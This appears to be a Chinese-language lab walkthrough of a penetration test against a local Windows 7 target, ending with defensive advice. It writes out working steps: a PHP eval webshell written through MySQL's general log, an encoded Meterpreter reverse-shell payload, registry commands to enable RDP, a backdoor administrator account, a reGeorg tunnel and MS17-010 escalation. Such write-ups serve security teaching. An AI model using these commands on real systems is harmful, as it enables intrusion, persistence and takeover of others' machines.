渗透测试实战教学：从信息收集到系统提权<\/h1>

实验环境<\/h2>

靶机<\/strong>: Windows 7 (IP: 192.168.42.128)<\/li>

攻击机<\/strong>: Kali Linux 2020 (IP: 192.168.42.129)<\/li> <\/ul>
0x01 信息收集阶段<\/h2>
1.1 端口扫描<\/h3>
使用Nmap进行服务版本探测扫描：<\/p>
nmap -sV 192.168.42.128 <\/span><\/span><\/code><\/pre>1.2 Web服务枚举<\/h3> 发现开放80端口，进行Web目录枚举：<\/p> 发现phpinfo.php<\/code>文件<\/li> 发现phpMyAdmin<\/code>管理界面<\/li> <\/ul> 访问phpinfo.php<\/code>获取重要信息：<\/p> Web根目录位置<\/li> PHP配置信息<\/li> 服务器环境信息<\/li> <\/ul> 1.3 phpMyAdmin弱口令攻击<\/h3> 尝试使用默认凭证登录：<\/p> 用户名: root<\/code><\/li> 密码: root<\/code> 成功进入phpMyAdmin后台，获取以下信息：<\/li> MySQL版本信息<\/li> Apache服务器配置信息<\/li> <\/ul> 0x02 通过phpMyAdmin日志文件getshell<\/h2> 2.1 检查写入权限<\/h3> SHOW<\/span> VARIABLES LIKE<\/span> 'secure_file_priv'<\/span>; <\/span><\/span><\/code><\/pre>若返回值为NULL<\/code>，表示MySQL不允许导入导出文件。<\/p> 2.2 配置日志文件<\/h3> 查看当前日志状态：<\/li> <\/ol> SHOW<\/span> VARIABLES LIKE<\/span> '%general_log%'<\/span>; <\/span><\/span><\/code><\/pre> 开启日志并修改日志路径：<\/li> <\/ol> SET<\/span> GLOBAL<\/span> general_log =<\/span> 'ON'<\/span>; <\/span><\/span>SET<\/span> GLOBAL<\/span> general_log_file =<\/span> 'C:\/phpStudy\/WWW\/log.php'<\/span>; <\/span><\/span><\/code><\/pre> 通过SQL语句写入一句话木马：<\/li> <\/ol> SELECT<\/span> '<?php @eval($_POST["obse"]);?>'<\/span>; <\/span><\/span><\/code><\/pre> 验证木马是否可用：访问http:\/\/192.168.42.128\/log.php<\/code>并使用中国蚁剑连接。<\/li> <\/ol> 0x03 利用Yxcms进行getshell<\/h2> 3.1 识别CMS<\/h3> 发现目标系统使用Yxcms内容管理系统。<\/p> 3.2 获取后台密码<\/h3> 通过phpMyAdmin查看管理员表获取密码哈希<\/li> 尝试MD5解密（失败）<\/li> 尝试默认密码123456<\/code>成功登录<\/li> <\/ol> 3.3 插入木马文件<\/h3> 通过前台模板编辑功能插入PHP木马<\/li> 注意Yxcms目录结构： protected\/<\/code><\/li> public\/<\/code><\/li> <\/ul> <\/li> 定位木马文件位置<\/li> <\/ol> 0x04 后渗透操作<\/h2> 4.1 建立稳定会话<\/h3> 使用中国蚁剑连接Webshell<\/li> 生成Meterpreter payload：<\/li> <\/ol> msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.42.129 LPORT=<\/span>4444<\/span> -e x86\/shikata_ga_nai -i 5<\/span> -f exe > 123.exe <\/span><\/span><\/code><\/pre> 上传并执行payload获取Meterpreter会话<\/li> <\/ol> 4.2 开启RDP服务<\/h3> 检查3389端口状态：<\/li> <\/ol> netstat -ano <\/span><\/span><\/code><\/pre> 通过注册表开启RDP：<\/li> <\/ol> echo<\/span> Windows Registry Editor Version 5.00>>3389.reg <\/span><\/span>echo<\/span> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg <\/span><\/span>echo<\/span> "fDenyTSConnections"<\/span>=dword:00000000>>3389.reg <\/span><\/span>echo<\/span> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg <\/span><\/span>echo<\/span> "PortNumber"<\/span>=dword:00000d3d>>3389.reg <\/span><\/span>echo<\/span> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp]>>3389.reg <\/span><\/span>echo<\/span> "PortNumber"<\/span>=dword:00000d3d>>3389.reg <\/span><\/span>regedit \/s 3389.reg <\/span><\/span>del<\/span> 3389.reg <\/span><\/span><\/code><\/pre> 添加管理员用户：<\/li> <\/ol> net user obse Password@007 \/add <\/span><\/span>net localgroup administrators obse \/add <\/span><\/span><\/code><\/pre>4.3 使用reGeorg建立Socks代理<\/h3> 上传tunnel.php<\/code>到Web目录<\/li> 启动reGeorg代理：<\/li> <\/ol> python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 2333<\/span> -u http:\/\/192.168.42.128\/yxcms\/protected\/apps\/default\/view\/default\/tunnel.php <\/span><\/span><\/code><\/pre> 配置Proxifier：添加Socks5代理<\/li> 设置代理规则仅应用于mstsc.exe<\/code><\/li> <\/ul> <\/li> <\/ol> 4.4 权限提升<\/h3> 尝试BypassUAC提权（失败）<\/p> <\/li> 使用系统漏洞提权：<\/p> 收集系统信息：<\/li> <\/ul> systeminfo <\/span><\/span><\/code><\/pre> 使用在线工具分析可利用漏洞：提权辅助页面<\/a><\/p> <\/li> 发现MS17-010(EternalBlue)漏洞可利用<\/p> <\/li> <\/ul> <\/li> 利用MS17-010提权成功，获取SYSTEM权限<\/p> <\/li> <\/ol> 关键点总结<\/h2> 信息收集<\/strong>：全面扫描和枚举是渗透成功的基础<\/li> 多途径攻击<\/strong>：同时尝试多种攻击路径提高成功率<\/li> 日志文件利用<\/strong>：当无法直接导出文件时，日志文件是getshell的有效方法<\/li> CMS利用<\/strong>：已知CMS的默认凭证和漏洞是重要突破口<\/li> 权限维持<\/strong>：建立多种会话方式确保访问不中断<\/li> 横向移动<\/strong>：使用代理工具绕过网络限制<\/li> 权限提升<\/strong>：系统漏洞是利用的最后关键步骤<\/li> <\/ol> 防御建议<\/h2> 禁用phpMyAdmin的root账户或使用强密码<\/li> 限制MySQL的文件操作权限<\/li> 及时更新CMS系统和修补已知漏洞<\/li> 禁用不必要的服务如RDP或严格限制访问<\/li> 定期更新操作系统补丁<\/li> 实施最小权限原则<\/li> 监控异常日志和网络流量<\/li> <\/ol>